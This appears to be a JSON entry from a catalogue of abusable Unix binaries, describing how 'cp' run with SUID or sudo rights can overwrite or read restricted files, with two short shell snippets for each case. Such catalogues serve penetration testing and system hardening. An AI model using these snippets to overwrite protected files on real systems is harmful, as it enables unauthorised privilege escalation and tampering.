{ "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.", "functions": { "suid": [ { "code": "TF=$(mktemp)\necho \"DATA\" > $TF\n./cp $TF [file]\n" } ], "sudo": [ { "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF [file]\n" } ] } }